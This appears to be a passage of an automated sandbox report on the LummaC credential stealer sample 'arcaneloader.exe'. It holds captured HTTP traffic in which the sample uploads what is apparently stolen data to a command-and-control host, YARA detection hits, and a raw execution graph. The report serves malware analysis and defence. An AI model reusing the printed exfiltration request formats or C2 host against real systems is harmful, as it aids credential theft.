                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=jd1gpd8b72q42aq9spj6aeennu; expires=Wed, 19-Mar-2025 07:49:55 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3JBEVqfot7p6SYnWyQ61VYLv1HqG8JhmJ%2BmURKaXzR4m1bhEfOAh8L6RzFhwUx2P%2FvFXy5MBgnfOBUai%2F9a0gp0E7mcgOG73dL6mbNoYE0oD8jM8q4nuU2Vq2Wpb4R8DOuo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b3a3e89c18c4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1545&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2137&delivery_rate=1922317&cwnd=169&unsent_bytes=0&cid=15fe59071520a229&ts=740&x=0"
                                                                        2024-11-23 14:03:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 14:03:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.649734172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:18 UTC273OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=YM5UPZ14
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 552578
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: 2d 2d 59 4d 35 55 50 5a 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34 0d 0a 2d 2d 59 4d 35 55 50 5a 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4d 35 55 50 5a 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f 6e 65 77 78 64 78 78 0d 0a 2d 2d 59 4d 35 55 50 5a 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                        Data Ascii: --YM5UPZ14Content-Disposition: form-data; name="hwid"D1DAEAD3B896F67BD8DCFC0BCFF02CE4--YM5UPZ14Content-Disposition: form-data; name="pid"1--YM5UPZ14Content-Disposition: form-data; name="lid"LPnhqo--pyokonewxdxx--YM5UPZ14Content-D
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: 1b 23 1f b7 0f 48 a6 fd aa 74 1b ae 14 fc f4 16 19 e1 b2 21 62 02 f7 d3 ec 5c 8e 67 d4 9f ac 58 f3 fd b1 a9 d2 0d 96 73 3a cd 14 bf a4 b0 4b bf 78 9b 54 5b 25 b4 17 c0 8d 89 de 84 29 03 29 c1 ab 51 cd d5 9a 88 99 c2 46 68 f3 12 98 45 6e 8d 46 11 3b 5b 1b 84 d5 4f ba 24 65 16 4d fb 65 8d fa 52 ea 1e ae 9c fc 7c 02 24 a7 87 71 a9 cf 41 df b3 22 dd 06 19 f7 c0 02 57 7d ac 1a 7d 56 12 7c 67 97 72 fe 9d 63 ad 5b e9 81 57 bc 4b 7a 65 e0 35 ff a6 62 23 2c 7f 9a 6f 53 53 1e dd a5 05 d7 06 ec 8b 86 18 68 d6 4c 52 ad ce 08 21 df 0e 6c fe 46 99 92 c0 b3 f9 0b 17 d8 cf c7 3a 27 0c 34 bf 29 d7 b3 51 8d db 11 f3 3f cb a6 bc 54 52 4a 69 95 9f 2d db c1 52 68 77 ff bb e3 8c 24 f4 95 fb 1c 67 bd b7 43 af a5 16 06 0b 8a ff ef f6 c9 85 2b cc 89 c3 ca 52 26 20 39 65 7d 85 8b
                                                                        Data Ascii: #Ht!b\gXs:KxT[%))QFhEnF;[O$eMeR|$qA"W}}V|grc[WKze5b#,oSShLR!lF:'4)Q?TRJi-Rhw$gC+R& 9e}
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: 55 1d a1 15 1b ce 96 0c 0d 6a 7d e1 79 52 81 38 10 12 33 fd fd 6b 96 07 70 28 b0 8f 88 e8 23 9e 35 96 f0 10 68 4a a1 62 1e 6e 07 07 09 2e 8c 31 3f ce 85 7d 92 e3 d9 76 cb fd 66 a7 0d 8d 88 bd 72 20 14 62 25 95 df 58 68 1b 32 5e c4 12 15 83 63 34 5a f7 c8 5c 02 16 6f 76 7c e7 0f 4f eb 77 7f 30 6e af dd 30 9a 2e ee b6 7d 6e eb f1 55 63 ba 96 d5 52 fb c6 67 48 43 85 46 c6 c2 dd 83 2c 95 69 46 5e 95 76 35 bd 3e fa 7b 5e d0 bc f3 f4 53 c7 b4 a7 c1 23 d2 e2 6f ac 6c 7d ad b6 6b 6d b6 ae 23 28 a3 b4 c6 4f e2 8e fb de c4 90 da e3 c0 cc 80 62 84 1b 86 01 71 ed 44 a9 ee 73 7d f6 e6 6b 49 d6 2a 58 d2 c5 2d 0c dd 46 83 61 49 00 02 03 fe 05 34 c1 c9 34 0d 7b b0 d4 d0 a2 e2 aa 0d 7e 55 fe 5e 5f 82 c8 3d 98 8a a4 b0 0e a0 87 5b e0 2a 70 fb 17 4d fb 26 42 45 62 8c 06 00
                                                                        Data Ascii: Uj}yR83kp(#5hJbn.1?}vfr b%Xh2^c4Z\ov|Ow0n0.}nUcRgHCF,iF^v5>{^S#ol}km#(ObqDs}kI*X-FaI44{~U^_=[*pM&BEb
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: d6 bd 2c c4 a1 48 64 cf 25 c5 61 f5 6f 80 b0 97 68 89 79 89 25 7e 99 94 5b e0 06 67 7e 42 4b 5e bb 84 e2 ca b9 a1 1d 22 ac 1f 41 6d 30 d2 13 03 94 fb 4e cc 4d 15 59 ea cd 25 15 ad 22 d1 39 7e f9 65 38 c9 d0 60 e1 1b de ad 54 80 b6 0f 63 dd ff 1d 15 e3 cc cb 9c da c8 3c 9c ff 7a bd bb 15 b8 78 be 95 00 e1 45 a7 c2 97 da f3 7e 65 dc bb d1 c6 b6 ed 14 b0 ed f7 64 cb f6 a4 08 19 27 1b 4d 45 3a 1b 92 64 b2 e4 8b 4a 00 ab 2c f2 a2 2f 6e d3 48 68 61 ba 7c 41 51 e2 94 8c 85 4d 88 27 cf a1 9c 96 09 90 8b cf 8f 47 f0 1b c7 92 66 b7 4f bf d9 c7 a9 45 95 b6 7b 82 67 b4 af 8d d9 b9 41 89 dd 3e 04 6e 3c 57 95 09 57 1a a1 9f d5 d7 44 65 2d 16 1f a2 95 4b b0 14 45 f6 ac 35 3c 22 5e 98 e4 be d3 9a 74 d7 20 48 be 6d ab b7 6f 5b e7 6f a3 50 f7 b3 de 16 53 06 c4 90 f4 33 7e
                                                                        Data Ascii: ,Hd%aohy%~[g~BK^"Am0NMY%"9~e8`Tc<zxE~ed'ME:dJ,/nHha|AQM'GfOE{gA>n<WWDe-KE5<"^t Hmo[oPS3~
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: d6 1a 4f 72 87 0d 6a 32 a7 a3 1f d5 21 21 9f 87 67 6e 90 48 ad d7 e6 23 27 7b 25 b4 48 36 24 7a 72 8a 08 5b a4 f6 ec 02 26 e0 b5 7f 04 75 7a cf ec 43 2d 61 53 83 b5 de 9b 82 9b 3b ad bb c7 3b 9d 3b f4 12 41 b0 55 2a cc 56 e6 36 7c 43 24 97 1c 1b b2 70 88 38 da e2 d0 b8 1b 44 e9 4b b5 6e ed 54 9b 53 40 2c eb 42 7f 62 ff f4 4b 1d f0 a3 b7 21 46 95 f3 5e 46 a9 29 36 e1 99 ea a2 2f 4f 72 6c 16 ed 5b a4 3e 93 d4 ae cf fe fc a7 90 9a f1 12 b5 66 fd ae e3 86 65 4a a9 68 7a 7b 43 09 ef 7c 1a 75 ea 8a 5d e2 bc 1f af 21 6f af 54 a0 75 40 24 65 99 b8 ea 55 a2 bf 3d 71 f9 0a ef de d5 aa 81 e0 81 b3 33 b0 df 9d fe 12 8e 79 4e d5 84 f0 14 8c 28 81 7b 93 84 34 08 e8 7f 0f 77 3d 9d 75 46 f2 a0 49 0f da a5 ca a7 56 17 61 da da 9b 03 67 e4 1b f3 5e cf d3 1f 75 28 59 8d 65
                                                                        Data Ascii: Orj2!!gnH#'{%H6$zr[&uzC-aS;;;AU*V6|C$p8DKnTS@,BbK!F^F)6/Orl[>feJhz{C|u]!oTu@$eU=q3yN({4w=uFIVag^u(Ye
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: ee c1 d1 1b 37 7a 11 80 74 55 eb de 10 e5 98 2a 71 b2 84 4d 61 b6 32 c1 a1 40 16 6c 1d 18 8e 81 72 05 c0 97 ec ae a2 d5 74 48 df 19 b0 c4 49 49 68 54 6e 5a 23 88 95 17 05 f2 7f 5e e2 e4 81 2c 33 f6 c9 cf d8 29 1c 6c d6 8e 03 f9 fa a8 e8 64 2b 03 87 52 a1 c0 a1 88 dc 34 be 68 e4 30 1a 33 6b 5d 43 9b 23 2d d8 c2 8d 3c c4 4e c0 c6 76 1e f8 98 af 51 ed 72 16 79 41 00 fe 65 99 5b 9b 5c 75 89 53 f2 11 7b 9a 2e 2c 76 59 20 e6 fb e8 ce 99 cb cf 2c e5 7b 2f 4c d9 a3 63 79 33 9a a6 d4 4c 59 fd 74 0d cc 7f 5e ab 7b 6f 02 1f fb 01 d1 e4 56 50 37 5b d7 78 cd 65 10 ef 8e 85 37 b2 fb ee b9 1f 18 95 83 23 15 49 67 00 32 c1 2b 2e 06 72 b9 57 fd c6 c6 3e 90 ae 12 49 27 28 14 39 64 17 76 5c 14 c4 1c da 6d 85 27 23 14 95 6a a7 61 bd 8a fa 46 ad e9 20 45 cf 94 37 d6 39 55 13
                                                                        Data Ascii: 7ztU*qMa2@lrtHIIhTnZ#^,3)ld+R4h03k]C#-<NvQryAe[\uS{.,vY ,{/Lcy3LYt^{oVP7[xe7#Ig2+.rW>I'(9dv\m'#jaF E79U
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: ac 53 2c bc 82 9a fe 9c 59 29 ca 7d 35 99 44 91 d2 d6 f8 25 aa 5d 90 c0 89 ee fa 36 6f 6c 19 6c 29 08 d6 e6 6a b6 1a bc b2 dc d2 aa 4c 42 29 42 c0 49 4a db 76 f1 03 84 83 e8 3d ff b7 22 34 7c c7 af 2b fc f4 a1 2e 59 a3 fc aa f5 1d c7 4a dd ce 4f 08 2c 6c 15 62 42 ac 89 9b 0d 64 5d 3c b6 08 de a9 3c 67 8a 8b 8c d1 bc 46 24 36 b5 32 ee c1 7e b7 38 d0 fe bf b5 82 b2 12 28 ee fb 44 a3 80 31 5a 15 a2 06 9e a1 bb c0 09 91 54 be ed 6f 63 b4 14 de e4 fd 48 ca e3 29 fc e8 6b ac 4d 66 fa 53 78 38 04 72 f2 f1 5f 44 58 25 80 f1 83 f1 6d 90 1c f8 46 81 0f b1 16 57 3d f5 80 f0 83 59 20 66 4f 2d 69 36 b7 22 04 9f 2f 8b 46 17 72 65 2e c4 0d a8 a7 61 19 04 84 5b 57 50 99 17 4d ce 31 d4 00 95 c8 98 41 17 3f 72 96 e1 dd 37 78 ae 30 09 85 34 df dd a7 84 fe ed 89 37 23 94 73
                                                                        Data Ascii: S,Y)}5D%]6oll)jLB)BIJv="4|+.YJO,lbBd]<<gF$62~8(D1ZTocH)kMfSx8r_DX%mFW=Y fO-i6"/Fre.a[WPM1A?r7x047#s
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: c1 67 db 8e 99 f9 a1 fa ae f3 14 dc 4c 15 f5 8f 90 d9 ae a1 5b 2f ec 0a 0d d8 79 e6 d8 20 2e 6a 58 f4 f7 eb 48 6c 13 8f c3 7a 25 84 eb ee 63 a4 89 07 83 1f d0 c2 a1 31 ab 64 6e c3 14 19 2e 0e c6 1c 17 de c5 62 19 cc e7 7c f3 a2 7f 0f e4 c1 a7 73 6b 38 ef 45 96 b2 ec 13 a9 1a ba 4a 89 de 74 59 9b af 06 dc 12 df 5b b2 c2 12 15 7a 1f db de b6 5a e4 c3 e9 fe e2 26 17 79 77 12 f7 73 c3 e7 e6 e2 46 f4 52 9b bc 42 75 ed 76 d1 b6 d7 49 e2 c7 03 ea f8 48 2a f0 8f 08 56 e5 55 7c 2d c3 e8 10 b1 a5 99 34 46 69 57 e6 12 0b f8 70 fd 17 5d 0c fd 49 37 21 1c 55 c6 c1 3f db d9 29 06 2b 64 6b 64 29 99 43 d4 cc 75 6a 9b 78 8d 0f da 07 88 88 40 17 71 f9 c8 29 a5 f6 54 6c ef aa 6c 7f c4 76 d9 83 80 c5 89 5d f4 d3 48 26 8a 31 72 4d 63 bf 04 f1 fb 73 eb bc 13 85 aa c1 4a 2d fc
                                                                        Data Ascii: gL[/y .jXHlz%c1dn.b|sk8EJtY[zZ&ywsFRBuvIH*VU|-4FiWp]I7!U?)+dkd)Cujx@q)Tllv]H&1rMcsJ-
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: 4a 63 fd 0f 4e 3a ba c0 8b ce 2a 91 53 8d 14 73 97 62 75 d7 68 f5 e1 d6 ad 17 bc a0 71 55 cb de ed 72 91 7b df 13 19 e9 56 16 0f 22 46 ab ee ef 8f 5c c9 23 dc e9 db d8 53 1b 54 6d b3 07 d3 af 6e 8f 27 25 b2 f1 35 e6 0c 22 97 04 93 f3 20 f1 63 ca 2a 25 fb 34 52 d5 72 9a 2c c5 44 44 96 76 6d 6b 74 da a1 16 ad 2d df ba 44 d5 6a 54 49 48 6a b6 22 d7 50 58 64 79 fa a8 38 25 08 2d 94 34 e2 e3 4a e5 a2 22 13 b8 55 df 1d f1 07 bd 44 b7 f1 84 34 26 6d 7b 0e 4b 3f ed a6 7d a2 f2 cf b5 e4 03 70 a8 28 4f 56 7a 4e 69 64 c1 2d 34 a2 03 0d 2f 75 ff a7 f4 8c c1 16 5d e6 e7 bd 37 46 74 41 aa 12 c1 e8 ff 6d 00 5b b7 66 f5 ca 81 f6 07 95 27 fe b9 a4 22 b9 49 f3 85 2d ea 9d 90 e1 f5 4b aa ba 18 66 b1 15 5d 8b 0d 58 ac ac 9b ef b1 21 d4 c1 0d 02 6e d1 50 0c 0e 25 b6 85 6a ff
                                                                        Data Ascii: JcN:*SsbuhqUr{V"F\#STmn'%5" c*%4Rr,DDvmkt-DjTIHj"PXdy8%-4J"UD4&m{K?}p(OVzNid-4/u]7FtAm[f'"I-Kf]X!nP%j
                                                                        2024-11-23 14:03:18 UTC15331OUTData Raw: 55 a6 f4 8e 64 a5 a3 61 54 38 ea 5a 34 5d 96 1b 98 26 ac c3 d1 df be 66 7f 2b a3 07 82 33 e1 bc 41 a6 68 92 7e 23 f4 cc ba 65 a6 b5 1a db af 9e 84 a7 16 6e fa a5 b2 6f d9 11 58 e3 b7 24 76 a9 ca 52 d8 ad ef b1 6c ec 2d b5 00 1b 38 02 15 89 82 95 bf 6c ca 39 4e ba a0 16 e6 30 f0 33 75 3e b1 ef 7b 86 17 34 60 74 c3 7a 03 e1 04 68 78 08 ef db 75 f5 6e 6e ed 7a 30 fb af 4d 0d 9f 8c f4 35 32 d3 24 6c 1b 1c 4d d9 f5 df 94 fb aa 9d c3 ee 02 fb e7 ba e4 48 cb 6e 44 ea af 79 58 02 d1 79 bc 25 2e b4 c6 32 df c5 09 07 0d 3b 63 49 6e 0c 38 7c cf c1 c6 45 91 8e fe af 2f 95 52 b8 da f8 37 3b a8 69 4a 29 ff 5a 6d 1b a8 0c e4 8f 99 67 ba 85 f7 f9 20 5b 6a cb d0 d8 be 7f a8 59 fb 63 7f 92 1a 43 56 d2 23 12 69 ad fb c3 02 76 b8 c3 14 15 99 17 2e f6 6a e1 81 93 b7 d6 42 46
                                                                        Data Ascii: UdaT8Z4]&f+3Ah~#enoX$vRl-8l9N03u>{4`tzhxunnz0M52$lMHnDyXy%.2;cIn8|E/R7;iJ)Zmg [jYcCV#iv.jBF
                                                                        2024-11-23 14:03:20 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=jsdbvch0koecbpg7ng5lkeos46; expires=Wed, 19-Mar-2025 07:49:59 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PEMMfNmgpzmil54KBQ27GMkefjhCSsZuVEB3TYFNb5CLM4H5WbrdnastZr%2F16GLCUO3eP4H4F%2BYom8zHJ%2FUIVUhbm8MYWVSLiBVOkTBcAtYCSkbbl%2FA9z62SyW2xJvOezkR"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b3b3892d0f6c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=310&recv=569&lost=0&retrans=0&sent_bytes=2839&recv_bytes=555071&delivery_rate=1801357&cwnd=180&unsent_bytes=0&cid=dfe6838815712377&ts=2222&x=0"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.649746172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:22 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 89
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:22 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f 6e 65 77 78 64 78 78 26 6a 3d 26 68 77 69 64 3d 44 31 44 41 45 41 44 33 42 38 39 36 46 36 37 42 44 38 44 43 46 43 30 42 43 46 46 30 32 43 45 34
                                                                        Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--pyokonewxdxx&j=&hwid=D1DAEAD3B896F67BD8DCFC0BCFF02CE4
                                                                        2024-11-23 14:03:23 UTC1003INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=sq4lu7holombfm9fekl35reg19; expires=Wed, 19-Mar-2025 07:50:01 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nFs30RESq474Na9pK5QSQukxLtBqFsodYvx9tC8kSyUV4tCJf6TWA32jkZWXRdYnEJF0l09YGMwnVIssL8RZIqL%2BiSYzNyRTA8joK7sVvvlJk0epod03C9f0hnBp2y9Qwe97"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b3ca1a24429e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2223&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=989&delivery_rate=1292607&cwnd=192&unsent_bytes=0&cid=4c200d84bad00f7b&ts=760&x=0"
                                                                        2024-11-23 14:03:23 UTC54INData Raw: 33 30 0d 0a 61 42 63 52 67 67 64 31 31 4d 35 6a 69 76 42 54 75 73 51 77 4e 61 4f 7a 44 2f 35 47 66 51 34 50 65 77 4e 68 58 48 34 35 71 58 38 7a 53 67 3d 3d 0d 0a
                                                                        Data Ascii: 30aBcRggd11M5jivBTusQwNaOzD/5GfQ4PewNhXH45qX8zSg==
                                                                        2024-11-23 14:03:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:09:03:00
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\arcaneloader.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\arcaneloader.exe"
                                                                        Imagebase:0xdb0000
                                                                        File size:507'392 bytes
                                                                        MD5 hash:F6AF7A6808F0E831FED6566C54B1E94E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2147698291.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:09:03:00
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:09:03:02
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\arcaneloader.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\arcaneloader.exe"
                                                                        Imagebase:0xdb0000
                                                                        File size:507'392 bytes
                                                                        MD5 hash:F6AF7A6808F0E831FED6566C54B1E94E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2265617650.000000000327A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:4.1%
                                                                          Dynamic/Decrypted Code Coverage:0.5%
                                                                          Signature Coverage:3.6%
                                                                          Total number of Nodes:1619
                                                                          Total number of Limit Nodes:29
                                                                          execution_graph 8844 dcbc45 8845 dcbc83 8844->8845 8849 dcbc53 __dosmaperr 8844->8849 8846 dcb757 __strnicoll 14 API calls 8845->8846 8848 dcbc81 8846->8848 8847 dcbc6e RtlAllocateHeap 8847->8848 8847->8849 8849->8845 8849->8847 8850 dc7207 __dosmaperr 2 API calls 8849->8850 8850->8849 8851 dbbe70 8852 dbbe9b 8851->8852 8855 dc6ed5 8852->8855 8858 dc7020 8855->8858 8859 dc704d 8858->8859 8860 dc705f 8858->8860 8885 dc53ec GetModuleHandleW 8859->8885 8870 dc71ba 8860->8870 8865 dbbeaf 8869 dc70b1 8871 dc71c6 __FrameHandler3::FrameUnwindToState 8870->8871 8893 dc8161 EnterCriticalSection 8871->8893 8873 dc71d0 8894 dc70b7 8873->8894 8875 dc71dd 8898 dc71fb 8875->8898 8878 dc6fef 8923 dc6fd6 8878->8923 8880 dc6ff9 8881 dc700d 8880->8881 8882 dc6ffd GetCurrentProcess TerminateProcess 8880->8882 8883 dc6f54 CallUnexpected 3 API calls 8881->8883 8882->8881 8884 dc7015 ExitProcess 8883->8884 8886 dc53f8 8885->8886 8886->8860 8887 dc6f54 GetModuleHandleExW 8886->8887 8888 dc6fb4 8887->8888 8889 dc6f93 GetProcAddress 8887->8889 8891 dc6fba FreeLibrary 8888->8891 8892 dc6fc3 8888->8892 8889->8888 8890 dc6fa7 8889->8890 8890->8888 8891->8892 8892->8860 8893->8873 8896 dc70c3 __FrameHandler3::FrameUnwindToState CallUnexpected 8894->8896 8897 dc7127 CallUnexpected 8896->8897 8901 dc776b 8896->8901 8897->8875 8922 dc8178 LeaveCriticalSection 8898->8922 8900 dc7096 8900->8865 8900->8878 8902 dc7777 __EH_prolog3 8901->8902 8905 dc79f6 8902->8905 8904 dc779e CallUnexpected 8904->8897 8906 dc7a02 __FrameHandler3::FrameUnwindToState 8905->8906 8913 dc8161 EnterCriticalSection 8906->8913 8908 dc7a10 8914 dc78c1 8908->8914 8913->8908 8915 dc78d8 8914->8915 8916 dc78e0 8914->8916 8918 dc7a45 8915->8918 8916->8915 8917 dcb0cb __freea 14 API calls 8916->8917 8917->8915 8921 dc8178 LeaveCriticalSection 8918->8921 8920 dc7a2e 8920->8904 8921->8920 8922->8900 8926 dcb94f 8923->8926 8925 dc6fdb CallUnexpected 8925->8880 8927 dcb95e CallUnexpected 8926->8927 8928 dcb96b 8927->8928 8930 dc9d53 8927->8930 8928->8925 8931 dc9e9e __dosmaperr 5 API calls 8930->8931 8932 dc9d6f 8931->8932 8932->8928 10474 dca5f0 10475 dca5fc __FrameHandler3::FrameUnwindToState 10474->10475 10486 dc8161 EnterCriticalSection 10475->10486 10477 dca603 10487 dcd839 10477->10487 10484 dca732 2 API calls 10485 dca621 10484->10485 10506 dca647 10485->10506 10486->10477 10488 dcd845 __FrameHandler3::FrameUnwindToState 10487->10488 10489 dcd84e 10488->10489 10490 dcd86f 10488->10490 10492 dcb757 __strnicoll 14 API calls 10489->10492 10509 dc8161 EnterCriticalSection 10490->10509 10493 dcd853 10492->10493 10494 dc7d69 __strnicoll 48 API calls 10493->10494 10495 dca612 10494->10495 10495->10485 10500 dca67c GetStartupInfoW 10495->10500 10496 dcd8a7 10517 dcd8ce 10496->10517 10497 dcd87b 10497->10496 10510 dcd789 10497->10510 10501 dca699 10500->10501 10502 dca61c 10500->10502 10501->10502 10503 dcd839 49 API calls 10501->10503 10502->10484 10504 dca6c1 10503->10504 10504->10502 10505 dca6f1 GetFileType 10504->10505 10505->10504 10526 dc8178 LeaveCriticalSection 10506->10526 10508 dca632 10509->10497 10511 dcb807 __dosmaperr 14 API calls 10510->10511 10512 dcd79b 10511->10512 10516 dcd7a8 10512->10516 10520 dc9c11 10512->10520 10513 dcb0cb __freea 14 API calls 10515 dcd7fd 10513->10515 10515->10497 10516->10513 10525 dc8178 LeaveCriticalSection 10517->10525 10519 dcd8d5 10519->10495 10521 dc9e9e __dosmaperr 5 API calls 10520->10521 10522 dc9c2d 10521->10522 10523 dc9c4b InitializeCriticalSectionAndSpinCount 10522->10523 10524 dc9c36 10522->10524 10523->10524 10524->10512 10525->10519 10526->10508 10536 dc6bf0 10537 dcb4a7 ___scrt_uninitialize_crt 77 API calls 10536->10537 10538 dc6bf8 10537->10538 10546 dcb864 10538->10546 10540 dc6bfd 10556 dcb90f 10540->10556 10543 dc6c27 10544 dcb0cb __freea 14 API calls 10543->10544 10545 dc6c32 10544->10545 10547 dcb870 __FrameHandler3::FrameUnwindToState 10546->10547 10560 dc8161 EnterCriticalSection 10547->10560 10549 dcb87b 10550 dcb8e7 10549->10550 10552 dcb8bb DeleteCriticalSection 10549->10552 10561 dced63 10549->10561 10567 dcb906 10550->10567 10555 dcb0cb __freea 14 API calls 10552->10555 10555->10549 10557 dcb926 10556->10557 10559 dc6c0c DeleteCriticalSection 10556->10559 10558 dcb0cb __freea 14 API calls 10557->10558 10557->10559 10558->10559 10559->10540 10559->10543 10560->10549 10562 dced76 __strnicoll 10561->10562 10570 dcee21 10562->10570 10564 dced82 10565 dc7fd7 __strnicoll 48 API calls 10564->10565 10566 dced8e 10565->10566 